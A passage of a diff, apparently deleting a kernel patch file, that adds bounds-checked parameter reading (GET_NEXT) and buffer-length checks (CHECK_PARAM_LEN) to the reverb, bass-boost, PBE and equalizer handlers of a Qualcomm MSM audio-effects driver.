- 		case REVERB_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -265,16 +328,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = reverb->enable_flag;
--			reverb->enable_flag = *values++;
-+			reverb->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:REVERB_ENABLE prev:%d,new:%d\n", __func__,
- 					prev_enable_flag, reverb->enable_flag);
- 			if (prev_enable_flag != reverb->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_ENABLE;
--				*updt_params++ = REVERB_ENABLE_PARAM_SZ;
--				*updt_params++ = reverb->enable_flag;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_ENABLE;
-+				*updt_params++ =
-+					REVERB_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->enable_flag;
- 			}
- 			break;
- 		case REVERB_MODE:
-@@ -283,16 +356,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->mode = *values++;
-+			reverb->mode =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_MODE val:%d\n",
- 				__func__, reverb->mode);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_MODE;
--				*updt_params++ = REVERB_MODE_PARAM_SZ;
--				*updt_params++ = reverb->mode;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_MODE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_MODE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_MODE;
-+				*updt_params++ =
-+					REVERB_MODE_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->mode;
- 			}
- 			break;
- 		case REVERB_PRESET:
-@@ -301,16 +384,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->preset = *values++;
-+			reverb->preset =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_PRESET val:%d\n",
- 					__func__, reverb->preset);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_PRESET;
--				*updt_params++ = REVERB_PRESET_PARAM_SZ;
--				*updt_params++ = reverb->preset;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_PRESET_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_PRESET", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_PRESET;
-+				*updt_params++ =
-+					REVERB_PRESET_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->preset;
- 			}
- 			break;
- 		case REVERB_WET_MIX:
-@@ -319,17 +412,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->wet_mix = *values++;
-+			reverb->wet_mix =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_WET_MIX val:%d\n",
- 				__func__, reverb->wet_mix);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_WET_MIX_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_WET_MIX", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_WET_MIX;
--				*updt_params++ = REVERB_WET_MIX_PARAM_SZ;
--				*updt_params++ = reverb->wet_mix;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_WET_MIX_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->wet_mix;
- 			}
- 			break;
- 		case REVERB_GAIN_ADJUST:
-@@ -338,17 +440,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->gain_adjust = *values++;
-+			reverb->gain_adjust =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_GAIN_ADJUST val:%d\n",
- 					__func__, reverb->gain_adjust);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_GAIN_ADJUST_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_GAIN_ADJUST", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_GAIN_ADJUST;
--				*updt_params++ = REVERB_GAIN_ADJUST_PARAM_SZ;
--				*updt_params++ = reverb->gain_adjust;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_GAIN_ADJUST_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->gain_adjust;
- 			}
- 			break;
- 		case REVERB_ROOM_LEVEL:
-@@ -357,17 +468,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->room_level = *values++;
-+			reverb->room_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_ROOM_LEVEL val:%d\n",
- 				__func__, reverb->room_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_ROOM_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ROOM_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_ROOM_LEVEL;
--				*updt_params++ = REVERB_ROOM_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->room_level;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_ROOM_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->room_level;
- 			}
- 			break;
- 		case REVERB_ROOM_HF_LEVEL:
-@@ -376,17 +496,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->room_hf_level = *values++;
-+			reverb->room_hf_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_ROOM_HF_LEVEL val%d\n",
- 				__func__, reverb->room_hf_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ROOM_HF_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_ROOM_HF_LEVEL;
--				*updt_params++ = REVERB_ROOM_HF_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->room_hf_level;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->room_hf_level;
- 			}
- 			break;
- 		case REVERB_DECAY_TIME:
-@@ -395,17 +524,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->decay_time = *values++;
-+			reverb->decay_time =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DECAY_TIME val:%d\n",
- 				__func__, reverb->decay_time);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DECAY_TIME_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DECAY_TIME", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DECAY_TIME;
--				*updt_params++ = REVERB_DECAY_TIME_PARAM_SZ;
--				*updt_params++ = reverb->decay_time;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DECAY_TIME_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->decay_time;
- 			}
- 			break;
- 		case REVERB_DECAY_HF_RATIO:
-@@ -414,17 +552,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->decay_hf_ratio = *values++;
-+			reverb->decay_hf_ratio =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DECAY_HF_RATIO val%d\n",
- 				__func__, reverb->decay_hf_ratio);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DECAY_HF_RATIO", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DECAY_HF_RATIO;
--				*updt_params++ = REVERB_DECAY_HF_RATIO_PARAM_SZ;
--				*updt_params++ = reverb->decay_hf_ratio;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->decay_hf_ratio;
- 			}
- 			break;
- 		case REVERB_REFLECTIONS_LEVEL:
-@@ -433,18 +580,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->reflections_level = *values++;
-+			reverb->reflections_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_REFLECTIONS_LEVEL val:%d\n",
- 				__func__, reverb->reflections_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ =
--				      AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
--				*updt_params++ =
--					REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->reflections_level;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_REFLECTIONS_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
-+				*updt_params++ =
-+				REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+				reverb->reflections_level;
- 			}
- 			break;
- 		case REVERB_REFLECTIONS_DELAY:
-@@ -453,18 +608,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->reflections_delay = *values++;
-+			reverb->reflections_delay =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_REFLECTIONS_DELAY val:%d\n",
- 				__func__, reverb->reflections_delay);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ =
--				      AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
--				*updt_params++ =
--					REVERB_REFLECTIONS_DELAY_PARAM_SZ;
--				*updt_params++ = reverb->reflections_delay;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_REFLECTIONS_DELAY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
-+				*updt_params++ =
-+				REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+				*updt_params++ =
-+				reverb->reflections_delay;
- 			}
- 			break;
- 		case REVERB_LEVEL:
-@@ -473,16 +636,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->level = *values++;
-+			reverb->level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_LEVEL val:%d\n",
- 				__func__, reverb->level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_LEVEL;
--				*updt_params++ = REVERB_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->level;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_LEVEL;
-+				*updt_params++ =
-+					REVERB_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->level;
- 			}
- 			break;
- 		case REVERB_DELAY:
-@@ -491,16 +664,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->delay = *values++;
-+			reverb->delay =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:REVERB_DELAY val:%d\n",
- 					__func__, reverb->delay);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_DELAY;
--				*updt_params++ = REVERB_DELAY_PARAM_SZ;
--				*updt_params++ = reverb->delay;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_DELAY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DELAY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_DELAY;
-+				*updt_params++ =
-+					REVERB_DELAY_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->delay;
- 			}
- 			break;
- 		case REVERB_DIFFUSION:
-@@ -509,17 +692,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->diffusion = *values++;
-+			reverb->diffusion =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DIFFUSION val:%d\n",
- 				__func__, reverb->diffusion);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DIFFUSION_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DIFFUSION", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DIFFUSION;
--				*updt_params++ = REVERB_DIFFUSION_PARAM_SZ;
--				*updt_params++ = reverb->diffusion;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DIFFUSION_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->diffusion;
- 			}
- 			break;
- 		case REVERB_DENSITY:
-@@ -528,17 +720,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->density = *values++;
-+			reverb->density =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DENSITY val:%d\n",
- 				__func__, reverb->density);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DENSITY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DENSITY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DENSITY;
--				*updt_params++ = REVERB_DENSITY_PARAM_SZ;
--				*updt_params++ = reverb->density;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DENSITY_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->density;
- 			}
- 			break;
- 		default:
-@@ -546,7 +747,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -560,15 +761,16 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 					struct bass_boost_params *bass_boost,
- 					long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -581,10 +783,14 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case BASS_BOOST_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -593,18 +799,27 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = bass_boost->enable_flag;
--			bass_boost->enable_flag = *values++;
-+			bass_boost->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: BASS_BOOST_ENABLE prev:%d new:%d\n",
- 				__func__, prev_enable_flag,
- 				bass_boost->enable_flag);
- 			if (prev_enable_flag != bass_boost->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_ENABLE;
--				*updt_params++ = BASS_BOOST_ENABLE_PARAM_SZ;
--				*updt_params++ = bass_boost->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->enable_flag;
- 			}
- 			break;
- 		case BASS_BOOST_MODE:
-@@ -613,17 +828,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			bass_boost->mode = *values++;
-+			bass_boost->mode =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: BASS_BOOST_MODE val:%d\n",
- 				__func__, bass_boost->mode);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_MODE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_MODE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_MODE;
--				*updt_params++ = BASS_BOOST_MODE_PARAM_SZ;
--				*updt_params++ = bass_boost->mode;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_MODE_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->mode;
- 			}
- 			break;
- 		case BASS_BOOST_STRENGTH:
-@@ -632,17 +856,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			bass_boost->strength = *values++;
--			pr_debug("%s: BASS_BOOST_STRENGTHi val:%d\n",
-+			bass_boost->strength =
-+				GET_NEXT(values, param_max_offset, rc);
-+			pr_debug("%s: BASS_BOOST_STRENGTH val:%d\n",
- 				__func__, bass_boost->strength);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_STRENGTH_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_STRENGTH", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_STRENGTH;
--				*updt_params++ = BASS_BOOST_STRENGTH_PARAM_SZ;
--				*updt_params++ = bass_boost->strength;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_STRENGTH_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->strength;
- 			}
- 			break;
- 		default:
-@@ -650,7 +883,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -664,15 +897,16 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 					struct pbe_params *pbe,
- 					long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, j, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -685,10 +919,14 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case PBE_ENABLE:
- 			pr_debug("%s: PBE_ENABLE\n", __func__);
-@@ -698,15 +936,24 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = pbe->enable_flag;
--			pbe->enable_flag = *values++;
-+			pbe->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (prev_enable_flag != pbe->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_PBE;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					PBE_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"PBE_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_PBE;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_PBE_ENABLE;
--				*updt_params++ = PBE_ENABLE_PARAM_SZ;
--				*updt_params++ = pbe->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					PBE_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					pbe->enable_flag;
- 			}
- 			break;
- 		case PBE_CONFIG:
-@@ -719,15 +966,26 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_PBE;
-+				params_length += COMMAND_PAYLOAD_SZ + length;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"PBE_PARAM", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_PBE;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_PBE_PARAM_CONFIG;
--				*updt_params++ = length;
-+				*updt_params++ =
-+					length;
- 				for (j = 0; j < length; ) {
- 					j += sizeof(*updt_params);
--					*updt_params++ = *values++;
-+					*updt_params++ =
-+						GET_NEXT(
-+						values,
-+						param_max_offset,
-+						rc);
- 				}
--				params_length += COMMAND_PAYLOAD_SZ + length;
- 			}
- 			break;
- 		default:
-@@ -735,7 +993,7 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length)
-+	if (params_length && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- invalid_config:
-@@ -747,15 +1005,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 					 struct eq_params *eq,
- 					 long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -768,11 +1027,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
